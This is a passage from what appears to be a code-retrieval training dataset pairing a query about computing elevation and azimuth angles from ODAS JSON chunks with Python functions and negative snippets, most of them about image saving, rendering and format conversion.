notebook. To embed it permanently,\n # must generate temporary image file and use Image().\n # display(s)\n\n x = s.render(\"tempo123\", format='png', view=False)\n os.remove(\"tempo123\")\n if jupyter:\n display(Image(x))\n else:\n open_image(\"tempo123.png\").show()", "def write_image(path, tokens, weights):\n\n f = render_attn_inner(tokens, weights)\n f.savefig(path, bbox_inches=\"tight\", frameon=False)\n plt.close(f)", "def edit_symbol_node(node, filename):\n size = int(re.findall('\\d+', filename)[-1])\n log.info('New filename %s; size %s', filename, size)\n\n node.set('typeId', SYMBOL_ID)\n node.find('name').text = 'DLS symbol'\n\n # Use PV name from rule in control PV for tooltip etc.\n # Reference that PV in rule to avoid duplication.\n pv_name = node.find('.//pv').text\n pv_element = et.Element('pv_name')\n pv_element.text = pv_name\n node.append(pv_element)\n node.find('.//pv').text = '$(pv_name)'\n\n rule_element = node.find('.//rule')\n rule_element.set('prop_id', 'image_index')\n rule_element.set('out_exp', 'true')\n\n file_element = et.Element('image_file')\n file_element.text = filename\n\n num_element = et.Element('symbol_number')\n num_element.text = '0'\n\n img_size_element = et.Element('sub_image_width')\n img_size_element.text = str(size)\n\n node.append(file_element)\n node.append(num_element)\n node.append(img_size_element)\n node.remove(node.find('opi_file'))", "def pnghack(filepath, width=2000, height=2000):\t#cmd.png() doesnt work with api\n cmd.set('ray_trace_frames', 1) # Frames are raytraced before saving an image.\n cmd.viewport(width, height) # Set resolution\n cmd.mpng(filepath, 1, 1) # Use batch png mode with 1 frame only\n cmd.mplay() # cmd.mpng needs the animation to 'run'", "def decode_image(file_location=\"images/encoded_sample.png\"):\n encoded_image = Image.open(file_location)\n red_channel = encoded_image.split()[0]\n\n\n x_size = encoded_image.size[0]\n y_size = encoded_image.size[1]\n\n\n decoded_image = Image.new(\"RGB\", encoded_image.size)\n pixels = decoded_image.load()\n for x in range(x_size):\n for y in range(y_size):\n red_pixel = red_channel.getpixel((x,y))\n binary = bin(red_pixel)\n\n lsb = int(binary[-1])\n if(lsb == 0):\n pixels[x,y] = (0,0,0)\n elif(lsb == 1):\n pixels[x,y] = (255,255,255)\n\n pass\n decoded_image.save(\"images/decoded_image.png\")", "def output_beat_to_file(file_name, e):\n print(\"Writing to file:\", file_name)\n routine = gp.compile(e,pset)\n with open(file_name+\".raw\",'w') as f:\n for t in range(200000):\n f.write(chr(int(routine(t+1))%256))\n # Now convert to wav\n subprocess.call(SOX_COMMAND + \" \" + file_name + \".raw\" + \" \" + file_name + \".wav\", shell=True)\n subprocess.call(LAME_COMMAND + \" \" + file_name + \".wav\", shell=True)", "def __make_png(self, abspath_img_rgb):\n if not os.path.exists(DIR_PNG):\n os.makedirs(DIR_PNG)\n\n outsize = '{}%'.format(OUTSIZE_RGB)\n img_name_rgb = os.path.basename(abspath_img_rgb)\n suffix_extension_tif = Utils.get_suffix_tif(img_name_rgb)\n img_png = img_name_rgb.replace(suffix_extension_tif, '.png')\n path_img_png = os.path.join(DIR_PNG, img_png)\n\n command = \"gdal_translate -ot byte -of PNG -outsize {} {} \" \\\n \"-a_nodata 0 -q {} {}\".format(\n outsize, outsize, abspath_img_rgb, path_img_png\n )\n os.system(command)\n return os.path.join(DIR_PNG_TO_DB, img_png)", "def save_file(self, _filename):\n imgsize = (self.__resolution[0], self.__resolution[1])\n print imgsize\n\n if(self.__resolution[2] == 1):\n # grayscale -> convert to RGB\n bg_white = (255, 255, 255)\n img = Image.new(\"RGB\", imgsize, bg_white)\n\n for x in xrange(0, self.__resolution[0], 1):\n for y in xrange(0, self.__resolution[1], 1):\n col = self.get_color(_pos)\n # duplicate the channels\n ucharcol = (255 * col[0], 255 * col[0], 255 * col[0])\n img.putpixel((x, self.__resolution[1] - y - 1), ucharcol)\n\n elif(self.__resolution[2] == 3):\n # RGB\n bg_white = (255, 255, 255)\n img = Image.new(\"RGB\", imgsize, bg_white)\n\n for x in xrange(0, self.__resolution[0], 1):\n for y in xrange(0, self.__resolution[1], 1):\n col = self.get_color(_pos)\n ucharcol = (255 * col[0], 255 * col[1], 255 * col[2])\n img.putpixel((x, self.__resolution[1] - y - 1), ucharcol)\n\n elif(self.__resolution[2] == 4):\n # RGBA\n bg_white = (255, 255, 255, 255)\n img = Image.new(\"RGBA\", imgsize, bg_white)\n\n for x in xrange(0, self.__resolution[0], 1):\n for y in xrange(0, self.__resolution[1], 1):\n col = 255 * self.get_color((x, y))\n ucharcol = (int(col[0]), int(col[1]), int(col[2]), int(col[3]))\n img.putpixel((x, self.__resolution[1] - y - 1), ucharcol)\n else:\n raise StandardError, ('supported number of channels are 1, 3, and 4, only.')\n\n img.save(_filename)", "def print_image(indiv,name):\n routine = gp.compile(indiv,pset)\n output = gen_beat_output(routine)\n bits = np.array(map(bitlist,output)[0:24000]).transpose()\n plt.style.use('classic')\n plt.imshow(bits,interpolation='nearest',aspect='auto',cmap=plt.get_cmap('Greys'))\n plt.savefig(name+\".png\",dpi=150)", "def create_regfile(userinput, x, y, filename, color='blue', width=2):\n target_dir = userinput['OUTDIR']\n outputfile = target_dir + '/s_extraction/{}'.format(filename)\n\n logging.info('Writing region file {}'.format(filename))\n\n with open(outputfile, 'w') as file:\n file.write('global color={} width={} font=\"helvetica 15 normal roman\" highlite=1 \\n'\\\n .format(color,width))\n file.write('image\\n')\n\n for i in range(len(x)):\n newline = 'circle(' + str(x[i]) + ',' + str(y[i]) + ',7) \\n'\n file.write(newline)", "def process_image(self):\n pass", "def save():\n pl.savefig('/home/filippini/Documents/plot/RUN55/compa'+INFO_RUN+'.png')", "def __init__(self, filename):\r\n self.__output__ = open(format(filename, '08X') + '.gen', 'wb')", "def generate_art(filename, x_size=1920, y_size=1080):\n # Functions for red, green, and blue channels - where the magic happens!\n red_function = build_random_function(7,8)\n green_function = build_random_function(4,6)\n blue_function = build_random_function(3,5)\n\n # Create image and loop over all pixels\n im = Image.new(\"RGB\", (x_size, y_size))\n pixels = im.load()\n for i in range(x_size):\n for j in range(y_size):\n x = remap_interval(i, 0, x_size, -1, 1)\n y = remap_interval(j, 0, y_size, -1, 1)\n pixels[i, j] = (\n color_map(evaluate_random_function(red_function, x, y)),\n color_map(evaluate_random_function(green_function, x, y)),\n color_map(evaluate_random_function(blue_function, x, y))\n )\n\n im.save(filename)", "def draw_to_png(diagram, options, filename, forward=True):\n if not isinstance(diagram, dict):\n diagram = {\"\": dict}\n options = create_options(options)\n before_title = options.raildraw_title_before\n after_title = options.raildraw_title_after\n # Create an empty image to give size_of something to reference\n empty_image = cairo.ImageSurface(cairo.FORMAT_ARGB32, 1, 1)\n empty_context = cairo.Context(empty_image)\n width, height = 0, 0\n for name, d in diagram.items():\n w, h, l = size_of(empty_context, d, options)\n width, height = max(width, w), h + height\n height += len(diagram) * (before_title + after_title)\n image = cairo.ImageSurface(cairo.FORMAT_ARGB32, int(width + 16), int(height + 16))\n context = cairo.Context(image)\n x = 8\n y = 8\n for name, d in diagram.items():\n draw_text(context, x, y, options.raildraw_title_font, name + \":\")\n y += after_title\n draw_to_context(context, d, options, filename, forward, x, y)\n # FIXME: store the size as computed 10 or 20 lines above to avoid\n # having to compute it twice\n y += size_of(context, d, options)[1]\n y += before_title\n image.write_to_png(filename)", "def hogg_savefig(prefix):\n for fn in [prefix + \".png\"]: # , prefix + \".pdf\"]:\n print \"saving \" + fn\n plt.savefig(fn)\n return None", "def export(self):\n def get_export_cmd(svgfile, fmt, dpi, outfile):\n if _use_rsvg and os.name == 'posix':\n # A DPI of 72 must be set to convert from files generated with\n # Inkscape v1+ to get the correct page size.\n ret = os.system('rsvg-convert --version 1>/dev/null')\n if ret == 0:\n return ('rsvg-convert' +\n ' --dpi-x=' + str(dpi * 72.0 / 96.0) +\n ' --dpi-y=' + str(dpi * 72.0 / 96.0) +\n ' --format=' + fmt +\n ' --output=\"' + outfile + '\"' +\n ' \"' + svgfile + '\"')\n else:\n return ('inkscape '\n + '--export-dpi=' + str(dpi) + ' '\n + '--export-type=' + fmt + ' '\n + '--export-filename=\"' + outfile + '\" '\n '\"' + svgfile + '\"')\n\n for line, svgfile in self.svgouts.iteritems():\n d = self.get_line_desc(line)\n outfile = self.get_output(d)\n if self.options.format == 'jpg':\n # TODO: output a jpg file\n self.options.format = 'png'\n outfile = outfile.replace('jpg', 'png')\n if self.options.format == 'svg':\n try:\n shutil.move(svgfile, outfile)\n except OSError:\n errormsg(_('Cannot create \"' + outfile + '\"'))\n else:\n cmd = get_export_cmd(svgfile,\n self.options.format,\n self.options.dpi, outfile)\n os.system(cmd)", "def draw_im(self, fname):\n im = self.get_im()\n im_agraph = nx.nx_agraph.to_agraph(im)\n im_agraph.draw(fname, prog='dot')", "def _writeGifToFile(fp, images, durations, loops):\n \n # Obtain palette for all images and count each occurance\n palettes, occur = [], []\n for im in images: \n palettes.append( getheader(im)[1] )\n for palette in palettes: \n occur.append( palettes.count( palette ) )\n \n # Select most-used palette as the global one (or first in case no max)\n globalPalette = palettes[ occur.index(max(occur)) ]\n \n # Init\n frames = 0\n firstFrame = True\n \n \n for im, palette in zip(images, palettes):\n \n if firstFrame:\n # Write header\n \n # Gather info\n header = getheaderAnim(im)\n appext = getAppExt(loops)\n \n # Write\n fp.write(header)\n fp.write(globalPalette)\n fp.write(appext)\n \n # Next frame is not the first\n firstFrame = False\n \n if True:\n # Write palette and image data\n \n # Gather info\n data = getdata(im) \n imdes, data = data[0], data[1:] \n graphext = getGraphicsControlExt(durations[frames])\n # Make image descriptor suitable for using 256 local color palette\n lid = getImageDescriptor(im) \n \n # Write local header\n if palette != globalPalette:\n # Use local color palette\n fp.write(graphext)\n fp.write(lid) # write suitable image descriptor\n fp.write(palette) # write local color table\n fp.write('\\x08') # LZW minimum size code\n else:\n # Use global color palette\n fp.write(graphext)\n fp.write(imdes) # write suitable image descriptor\n \n # Write image data\n for d in data:\n fp.write(d)\n \n # Prepare for next round\n frames = frames + 1\n \n fp.write(\";\") # end gif\n return frames", "def process_sound_map():\n pass", "def save_image(self):\r\n filename = filedialog.asksaveasfilename(title='Save Image As...',\r\n filetypes=((\"Portable Network Graphics (.png)\", \"*.png\"), (\"Portable Document Format(.pdf)\", \"*.pdf\")))\r\n self.graph.savefig(filename, dpi=self.graph.dpi)", "def create_svg(self, name_dict):\n s = StringIO.StringIO()\n for svg_line in open(self.options.input_file, 'r').readlines():\n # Modify the line to handle replacements from extension GUI\n svg_line = self.expand_extra_vars(svg_line, name_dict)\n # Modify the line to handle variables in svg file\n svg_line = self.expand_vars(svg_line, name_dict)\n s.write(svg_line)\n # Modify the svg to include or exclude groups\n root = etree.fromstring(s.getvalue())\n self.filter_layers(root, name_dict)\n svgout = self.get_svgout()\n try:\n f = open(svgout, 'w')\n f.write(etree.tostring(root,\n encoding='utf-8',\n xml_declaration=True))\n except IOError:\n errormsg(_('Cannot open \"' + svgout + '\" for writing'))\n finally:\n f.close()\n s.close()\n return svgout", "def process(out, args):\n\n # Convert options to chunks in the args.chunk list\n if args.gamma:\n v = int(round(1e5 * args.gamma))\n bs = io.BytesIO(struct.pack(\">I\", v))\n args.chunk.insert(0, Chunk(b\"gAMA\", bs))\n if args.sigbit:\n v = struct.pack(\"%dB\" % len(args.sigbit), *args.sigbit)\n bs = io.BytesIO(v)\n args.chunk.insert(0, Chunk(b\"sBIT\", bs))\n if args.iccprofile:\n # http://www.w3.org/TR/PNG/#11iCCP\n v = b\"a color profile\\x00\\x00\" + zlib.compress(args.iccprofile.read())\n bs = io.BytesIO(v)\n args.chunk.insert(0, Chunk(b\"iCCP\", bs))\n if args.transparent:\n # https://www.w3.org/TR/2003/REC-PNG-20031110/#11tRNS\n v = struct.pack(\">%dH\" % len(args.transparent), *args.transparent)\n bs = io.BytesIO(v)\n args.chunk.insert(0, Chunk(b\"tRNS\", bs))\n if args.background:\n # https://www.w3.org/TR/2003/REC-PNG-20031110/#11bKGD\n v = struct.pack(\">%dH\" % len(args.background), *args.background)\n bs = io.BytesIO(v)\n args.chunk.insert(0, Chunk(b\"bKGD\", bs))\n\n # Create:\n # - a set of chunks to delete\n # - a dict of chunks to replace\n # - a list of chunk to add\n\n delete = set(args.delete)\n # Generally, there should be at most one of the 'replacing' chunks.\n replacing = set([b\"gAMA\", b\"sBIT\", b\"PLTE\", b\"tRNS\", b\"sPLT\", b\"IHDR\"])\n replace = dict()\n add = []\n\n for chunk in args.chunk:\n if chunk.type in replacing:\n replace[chunk.type] = chunk\n else:\n add.append(chunk)\n\n input = png.Reader(file=args.input)\n\n return png.write_chunks(out, edit_chunks(input.chunks(), delete, replace, add))", "def add_processed_image(image_proc_type, name, b64_string, export_file_type):\n\n if image_proc_type == \"contrast stretching\":\n info = process_contrast_stretch(name, b64_string, export_file_type)\n metrics_list = list(info[4])\n num_pixels = metrics_list[0]\n x_coord = metrics_list[1]\n y_coord = metrics_list[2]\n avg_value = metrics_list[3]\n metrics_output = [num_pixels, x_coord, y_coord, avg_value]\n info[6] = info[6].decode(\"utf-8\")\n add_file(info[0], info[1], info[2], info[3], metrics_output, info[6])\n logging.info('Image processed with contrast stretching')\n\n if image_proc_type == \"adaptive equalization\":\n info = process_adapt_equalization(name, b64_string, export_file_type)\n metrics_list = list(info[4])\n num_pixels = metrics_list[0]\n x_coord = metrics_list[1]\n y_coord = metrics_list[2]\n avg_value = metrics_list[3]\n metrics_output = [num_pixels, x_coord, y_coord, avg_value]\n info[6] = info[6].decode(\"utf-8\")\n add_file(info[0], info[1], info[2], info[3], metrics_output, info[6])\n logging.info('Image processed with adaptive equalization')\n\n if image_proc_type == \"histogram equalization\":\n info = process_histogram_equalization(name, b64_string, export_file_type)\n metrics_list = list(info[4])\n num_pixels = metrics_list[0]\n x_coord = metrics_list[1]\n y_coord = metrics_list[2]\n avg_value = metrics_list[3]\n metrics_output = [num_pixels, x_coord, y_coord, avg_value]\n info[6] = info[6].decode(\"utf-8\")\n add_file(info[0], info[1], info[2], info[3], metrics_output, info[6])\n logging.info('Image processed with histogram equalization')\n\n if image_proc_type == \"reverse video\":\n info = process_reverse_image(name, b64_string, export_file_type)\n metrics_list = list(info[4])\n num_pixels = metrics_list[0]\n x_coord = metrics_list[1]\n y_coord = metrics_list[2]\n avg_value = metrics_list[3]\n metrics_output = [num_pixels, x_coord, y_coord, avg_value]\n info[6] = info[6].decode(\"utf-8\")\n add_file(info[0], info[1], info[2], info[3], metrics_output, info[6])\n logging.info('Image processed with reverse image')\n\n if image_proc_type == \"log compression\":\n info = process_log_compression(name, b64_string, export_file_type)\n metrics_list = list(info[4])\n num_pixels = metrics_list[0]\n x_coord = metrics_list[1]\n y_coord = metrics_list[2]\n avg_value = metrics_list[3]\n metrics_output = [num_pixels, x_coord, y_coord, avg_value]\n info[6] = info[6].decode(\"utf-8\")\n add_file(info[0], info[1], info[2], info[3], metrics_output, info[6])\n logging.info('Image processed with log compression')\n\n return jsonify(\"it worked\")", "def add_pixel_fn(filename: str, resample_name: str) -> None:\n\n header = \"\"\" <VRTRasterBand dataType=\"Byte\" band=\"1\" subClass=\"VRTDerivedRasterBand\">\"\"\"\n contents = \"\"\"\n <PixelFunctionType>{0}</PixelFunctionType>\n <PixelFunctionLanguage>Python</PixelFunctionLanguage>\n <PixelFunctionCode><![CDATA[{1}]]>\n </PixelFunctionCode>\"\"\"\n\n lines = open(filename, 'r').readlines()\n lines[3] = header # FIX ME: 3 is a hand constant\n lines.insert(4, contents.format(resample_name,\n get_resample(resample_name)))\n open(filename, 'w').write(\"\".join(lines))", "def save_image(self, image_file):\r\n self.ensure_pyplot()\r\n command = 'plt.gcf().savefig(\"%s\")'%image_file\r\n #print 'SAVEFIG', command # dbg\r\n self.process_input_line('bookmark ipy_thisdir', store_history=False)\r\n self.process_input_line('cd -b ipy_savedir', store_history=False)\r\n self.process_input_line(command, store_history=False)\r\n self.process_input_line('cd -b ipy_thisdir', store_history=False)\r\n self.process_input_line('bookmark -d ipy_thisdir', store_history=False)\r\n self.clear_cout()", "def save(file_name):\n setup()\n plt.savefig(file_name)", "def __main__() :\n try :\n poly = Polyhedre(sys.argv[1])\n \n name = sys.argv[2]\n \n createAllFiles(poly, name)\n\n createAllImageFiles(poly, name)\n \n except FileNotFoundError :\n print(\"Use an existing file\")", "def TextureFiles():\n import shutil\n\n # first convert the .psd files to .png\n\n FbmDir = glo.outputFolder + '.fbm'\n\n for d1, d2, filenames in os.walk(FbmDir):\n for filename in filenames:\n \"\"\"filename: vitrin_diffuse.psd\n \"\"\"\n # print \"TextureFiles():\", filename\n if filename[-4:].upper() == '.PSD':\n #print \" -- FbmDir:\" , FbmDir\n #print \" -- in the if clause with filename:\" , filename\n #print \" -- glo.outputFolder\" , glo.outputFolder\n # FbmDir = '../fbx/simplelifeembedmedia.fbm'\n # filename = 'shelves_light.PSD'\n PsdToPngConverter(FbmDir, filename)\n\n # Move only the .png file to the ../png/ directory\n filename = filename[:-4] + '.png'\n src = os.path.join(FbmDir, filename)\n elif filename[0] != '.':\n src = os.path.join(FbmDir, filename)\n pass\n\n shutil.copy(src, glo.outputFolder)\n print os.path.join(glo.outputFolder, filename), \"\\n\"\n sys.stdout.flush()\n # for d1, d2, files in os.walk(glo.outputFolder):\n # if not filename in files:\n # #print \"moving: \", files, filename, not filename in files\n # shutil.copy(src, glo.outputFolder)\n # print os.path.join(glo.outputFolder, filename), \"\\n\"\n # else:\n # print \"%s/%s already exists. File not moved\" % (glo.outputFolder,filename)", "def make_label_data(self):\n from xml.etree.ElementTree import Element, SubElement, dump, ElementTree, parse\n\n if not self.graphicsView.hasImage():\n self.showImageSelectionMessageBox()\n return\n\n app_doc_data = AppDocData.instance()\n project = app_doc_data.getCurrentProject()\n\n smalls = []\n bigs = []\n\n symbol_list = app_doc_data.getTargetSymbolList(all=True)\n for symbol in symbol_list:\n if symbol.width and symbol.height:\n if symbol.width > 300 or symbol.height > 300:\n bigs.append(symbol.getName())\n else:\n smalls.append(symbol.getName())\n\n symbols = [item for item in self.graphicsView.scene().items() if issubclass(type(item), SymbolSvgItem)]\n names = [smalls, bigs]\n\n img = app_doc_data.activeDrawing.image_origin\n\n small_size = 500\n big_size = 850\n\n save_path = project.getTrainingSymbolFilePath()\n\n index = 0\n for size in [small_size, big_size]:\n offsets = [0, int(size / 2)]\n\n width, height = img.shape[1], img.shape[0]\n width_count, height_count = width // size + 2, height // size + 2\n b_width, b_height = width_count * size, height_count * size\n b_img = np.zeros((b_height, b_width), np.uint8) + 255\n b_img[:height, :width] = img[:, :]\n\n for offset in offsets:\n for row in range(height_count):\n for col in range(width_count):\n x, y = col * size + offset, row * size + offset\n tile_rect = QRectF(x, y, size, size)\n tile_symbols = []\n for symbol in [symbol for symbol in symbols if symbol.name in names[index]]:\n if tile_rect.contains(symbol.sceneBoundingRect()):\n tile_symbols.append(symbol)\n symbols.remove(symbol)\n\n if tile_symbols:\n training_uid = str(uuid.uuid4())\n training_image_path = os.path.join(save_path, training_uid + '.png')\n training_xml_path = os.path.join(save_path, training_uid + '.xml')\n\n # save image\n #_img = b_img[round(tile_rect.top()):round(tile_rect.bottom()),\n # round(tile_rect.left()):round(tile_rect.right())]\n #cv2.imwrite(training_image_path, _img)\n _img = self.graphicsView.image().copy(round(tile_rect.left()), round(tile_rect.top()), round(tile_rect.width()), round(tile_rect.height()))\n _img.save(training_image_path)\n\n # save label\n xml = Element('annotation')\n SubElement(xml, 'folder').text = 'None'\n SubElement(xml, 'filename').text = os.path.basename(save_path)\n\n pathNode = Element('path')\n pathNode.text = save_path.replace('/', '\\\\')\n xml.append(pathNode)\n\n sourceNode = Element('source')\n databaseNode = Element('database')\n databaseNode.text = 'Unknown'\n sourceNode.append(databaseNode)\n xml.append(sourceNode)\n\n sizeNode = Element('size')\n widthNode = Element('width')\n widthNode.text = str(int(tile_rect.width()))\n sizeNode.append(widthNode)\n heightNode = Element('height')\n heightNode.text = str(int(tile_rect.height()))\n sizeNode.append(heightNode)\n depthNode = Element('depth')\n depthNode.text = '3'\n sizeNode.append(depthNode)\n xml.append(sizeNode)\n\n segmentedNode = Element('segmented')\n segmentedNode.text = '0'\n xml.append(segmentedNode)\n\n labelContent = []\n counts = {}\n for item in tile_symbols:\n rect = item.sceneBoundingRect()\n label, xMin, yMin, xMax, yMax = item.name, int(rect.x() - 5 - x), int(rect.y() - 5 - y), int(rect.x() + rect.width() + 5 - x), int(rect.y() + rect.height() + 5 - y)\n xMin = xMin if xMin > 0 else 0\n yMin = yMin if yMin > 0 else 0\n xMax = xMax if xMax < size else size\n yMax = yMax if yMax < size else size\n\n if label == 'None' or label == '':\n continue\n if label not in labelContent:\n labelContent.append(label)\n counts[label] = 1\n else:\n counts[label] = counts[label] + 1\n\n objectNode = Element('object')\n nameNode = Element('name')\n nameNode.text = label\n objectNode.append(nameNode)\n poseNode = Element('pose')\n poseNode.text = 'Unspecified'\n objectNode.append(poseNode)\n truncatedNode = Element('truncated')\n truncatedNode.text = '0'\n objectNode.append(truncatedNode)\n difficultNode = Element('difficult')\n difficultNode.text = '0'\n objectNode.append(difficultNode)\n\n bndboxNode = Element('bndbox')\n xminNode = Element('xmin')\n xminNode.text = str(xMin)\n bndboxNode.append(xminNode)\n yminNode = Element('ymin')\n yminNode.text = str(yMin)\n bndboxNode.append(yminNode)\n xmaxNode = Element('xmax')\n xmaxNode.text = str(xMax)\n bndboxNode.append(xmaxNode)\n ymaxNode = Element('ymax')\n ymaxNode.text = str(yMax)\n bndboxNode.append(ymaxNode)\n objectNode.append(bndboxNode)\n\n xml.append(objectNode)\n\n ElementTree(xml).write(training_xml_path)\n\n index += 1\n\n QMessageBox.about(self, self.tr(\"Notice\"), self.tr('Successfully applied. '))", "def main(filename):\n\n if not filename.endswith(SOURCE_TYPE):\n print(\"invalid file type, should be *\" + SOURCE_TYPE)\n return ERROR_FILE_TYPE\n\n commands = parse(filename, SymbolDict())\n\n if not commands:\n print(\"invalid asm syntax\")\n return ERROR_FILE_SYNTAX\n\n translate(commands, filename[:-len(SOURCE_TYPE)] + DEST_TYPE)\n\n return SUCCESS" ]
[ "0.5763709", "0.55842566", "0.5484444", "0.54430854", "0.5442242", "0.5435863", "0.53775424", "0.53518033", "0.53421825", "0.53008115", "0.52987564", "0.5291246", "0.5290452", "0.5279297", "0.52617425", "0.5226984", "0.5217233", "0.52096176", "0.51862746", "0.51822567", "0.51762855", "0.51399404", "0.512233", "0.5105043", "0.5100154", "0.50914484", "0.5087448", "0.50743026", "0.50676775", "0.506356", "0.5051232", "0.505046", "0.5044476", "0.5043442", "0.50318784", "0.50144655", "0.50098354", "0.50087297", "0.49924317", "0.49839854", "0.49829292", "0.49819046", "0.49814355", "0.49709675", "0.49689192", "0.4961625", "0.49533483", "0.49510556", "0.4935267", "0.49301493", "0.4925548", "0.492379", "0.49221352", "0.49176916", "0.49163833", "0.49138233", "0.49135885", "0.4913016", "0.491049", "0.49066004", "0.4899285", "0.48956877", "0.48928183", "0.48911667", "0.48846364", "0.4877936", "0.48757643", "0.48750687", "0.4872887", "0.48713982", "0.48649418", "0.48528227", "0.48516864", "0.48470598", "0.48463944", "0.48286214", "0.48281667", "0.4819295", "0.4819054", "0.4819049", "0.48181605", "0.48164743", "0.47999367", "0.47922197", "0.47918418", "0.47848234", "0.47727993", "0.47685167", "0.47660482", "0.4762805", "0.47618344", "0.4759364", "0.4755407", "0.47541025", "0.47528422", "0.47522935", "0.47483298", "0.47456068", "0.47446465", "0.47431377" ]
0.61083233
0
calculate_angles(chunk) calculates elevation and azimuth given a jsonformatted chunk from ODAS
def calculate_angles(self,chunk): import math import collections Angles = collections.namedtuple("Angles", "ev az") x = float(chunk['x']) y = float(chunk['y']) z = float(chunk['z']) ev = round(90 - math.acos(z/math.sqrt(x*x+y*y+z*z))*180/math.pi) az = round(math.atan2(y,x)*180/math.pi) return(Angles(ev, az))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def parse(all_blobs, all_angles):", "def extract_angles(self):\n atom_ids = self.contents['ID']\n angle_list = []\n for key, value in self.angles.items():\n a = value[0]\n b = value[1]\n c = value[2]\n\n lst = [a, b, c]\n\n A_ = np.asarray(atom_ids).reshape(-1, 3)\n\n sorted = np.argsort(lst)\n A_sorted = A_[:, sorted]\n\n idd = np.ones(len(A_sorted)) * key\n iff = np.arange(1, len(A_sorted) + 1)\n\n concate = np.concatenate((iff[:,np.newaxis], idd[:,np.newaxis], A_sorted), axis=-1)\n df = pd.DataFrame(data=concate, columns=['Mol_ID', 'Angle_type', 'Atom_1', 'Atom_2', 'Atom_3'])\n angle_list.append(df)\n self.angle_df = pd.concat(angle_list)\n self.num_angles = len(self.angle_df)", "def get_mean_viewing_angles(self) -> (float, float, float):\n # Get MTD XML file\n root, _ = self.read_mtd()\n\n # Open zenith and azimuth angle\n try:\n az = float(root.findtext(\".//SatelliteAzimuth\"))\n off_nadir = float(root.findtext(\".//ViewAngle\"))\n incidence_angle = float(root.findtext(\".//incidenceAngle\"))\n except TypeError:\n raise InvalidProductError(\n \"SatelliteAzimuth, ViewAngle or incidenceAngle not found in metadata!\"\n )\n\n return az, off_nadir, incidence_angle", "def calculate_angles(self, x, y):\n Oimat = inv(self.Omat)\n Mat = self.pixel_size * inv(self.Dmat) * Oimat\n polar_angles = []\n azimuthal_angles = []\n for i in range(len(x)):\n peak = Oimat * (vec(x[i], y[i]) - self.Cvec)\n v = norm(Mat * peak)\n polar_angle = np.arctan(v / self.distance)\n polar_angles.append(polar_angle)\n azimuthal_angles.append(np.arctan2(-peak[1, 0], peak[2, 0]))\n return (np.array(polar_angles) * degrees,\n np.array(azimuthal_angles) * degrees)", "def test_calcAngles_angles_or_axis(self, kargs, expected_len_result, expected_truncated_results):\n kargs['vsk'] = self.cal_SM\n result = pycgmCalc.calcAngles(self.motion_data, **kargs)\n np.testing.assert_equal(len(result), expected_len_result)\n np.testing.assert_almost_equal(result[0:5], expected_truncated_results)", "def __prepare_angles_contents(angles: Optional[dict],\n elements: list) -> list:\n\n angles_contents = []\n\n number_of_angles = len(angles) if angles is not None else 0\n\n angles_contents.append(\n ' {:^2}'.format(number_of_angles) +\n ' ! Nr of angles;' +\n 'at1;at2;at3;Thetao,o;ka;kb;pv1;pv2;val(bo)\\n')\n\n if number_of_angles:\n\n for key, values in angles.items():\n\n num = ReactiveForceFieldWriter.__get_num_from_str(elements,\n key)\n\n angles_contents.append(\n ' ' + num + ' ' * 2 +\n str(values['value']).lstrip('[').rstrip(']') +\n '\\n')\n\n return angles_contents", "def angle(z):", "def ADCangles(EL, HA, DEC, LAT=31.963972222):\n Z, HA, coDEC, coLAT = np.deg2rad([90 - EL, HA, 90 - DEC, 90 - LAT])\n if Z == 0:\n return np.zeros(3)\n sinZ = np.sin(Z)\n sinP = np.sin(HA) * np.sin(coLAT) / sinZ\n cosP = (np.cos(coLAT) - np.cos(coDEC) * np.cos(Z)) / (np.sin(coDEC) * sinZ)\n P = np.arctan2(sinP, cosP)\n # Formulas from DESI-4957\n tanZ = np.tan(Z)\n HORIZON = P + 0.5 * np.pi\n ADC1 = HORIZON + (0.0353 + tanZ * (0.2620 + tanZ * 0.3563))\n ADC2 = HORIZON - (0.0404 + tanZ * (0.2565 + tanZ * 0.3576))\n return np.rad2deg([P, ADC1, ADC2])", "def get_mean_sun_angles(self) -> (float, float):\n # Get MTD XML file\n root, _ = self.read_mtd()\n\n # Open zenith and azimuth angle\n zenith_angle = float(root.findtext(\".//SolarZenith\"))\n azimuth_angle = float(root.findtext(\".//SolarAzimuth\"))\n\n return azimuth_angle, zenith_angle", "def check_angle(self):\n self.find_pixels()\n alpha_theta=np.deg2rad(70)\n alpha_phi=np.deg2rad(70)\n extreme_values=self.compute_extreme_values(alpha_phi, alpha_theta)\n x=np.linspace(extreme_values[0], extreme_values[1], self.number_of_pix[1])\n y=np.linspace(extreme_values[2], extreme_values[3], self.number_of_pix[0])\n phi_0=20\n phi_0=np.deg2rad(phi_0)\n j, diff=self.compute_phi(\"find_orient.png\")\n print \"j=\", j\n print \"diff=\", diff", "def calculate_angles():\n time = request.args.get('time')\n\n result = Helpers.validate_and_parse_input(time)\n if result:\n hour, minute = result\n\n hour_angle = 0.5 * (hour * 60 + minute)\n minute_angle = 6 * minute\n\n angle = abs(hour_angle - minute_angle)\n angle = min(360 - angle, angle)\n DatastoreClient(kind='clock_angle_logs').log_to_datastore(time, angle)\n\n return Helpers.success(angle)\n else:\n DatastoreClient(kind='clock_angle_logs').log_to_datastore(time, 'bad_request')\n return Helpers.bad_request(r\"query parameter time should follow regex ^\\d{1,2}:\\d{1,2}$ and value should be \"\n r\"between 00:00 and 23:59\")", "def areas(self):\n\n height_delta = (np.cos(self.polar_corners[:-1, :-1]) - np.cos(self.polar_corners[:-1, 1:]))\n azimuth_delta = (self.azimuthal_corners[1:, 1:] - self.azimuthal_corners[:-1, 1:])\n\n return height_delta * azimuth_delta", "def calculate_average_angles(tube_steps,angular_file,pixel_step,tube_sep,extra_dummy=[]):\n no_of_overlaps = int(round((len(tube_steps)+len(extra_dummy))/pixel_step))-1\n correction_array = Array(read_horizontal_corrections(angular_file))\n no_of_tubes = len(correction_array)\n counter = array.zeros(no_of_tubes+no_of_overlaps,int)\n final_values = array.zeros(no_of_tubes+no_of_overlaps,float)\n for stepno in range(no_of_overlaps+1):\n counter[stepno:stepno+no_of_tubes]+=array.ones(no_of_tubes,int)\n final_values[stepno:stepno+no_of_tubes]+=correction_array\n ave_angles = final_values/counter\n print 'Check: average angles ' + `ave_angles`\n print 'Check: counter' + `counter`\n print 'Check: no of overlaps, tubes: %d %d ' % (no_of_overlaps,no_of_tubes)\n # Now apply these average corrections to the actual angles\n real_step = pixel_step\n if len(tube_steps)<pixel_step:\n real_step = len(tube_steps) #for when we have no overlap and missing steps\n final_values = 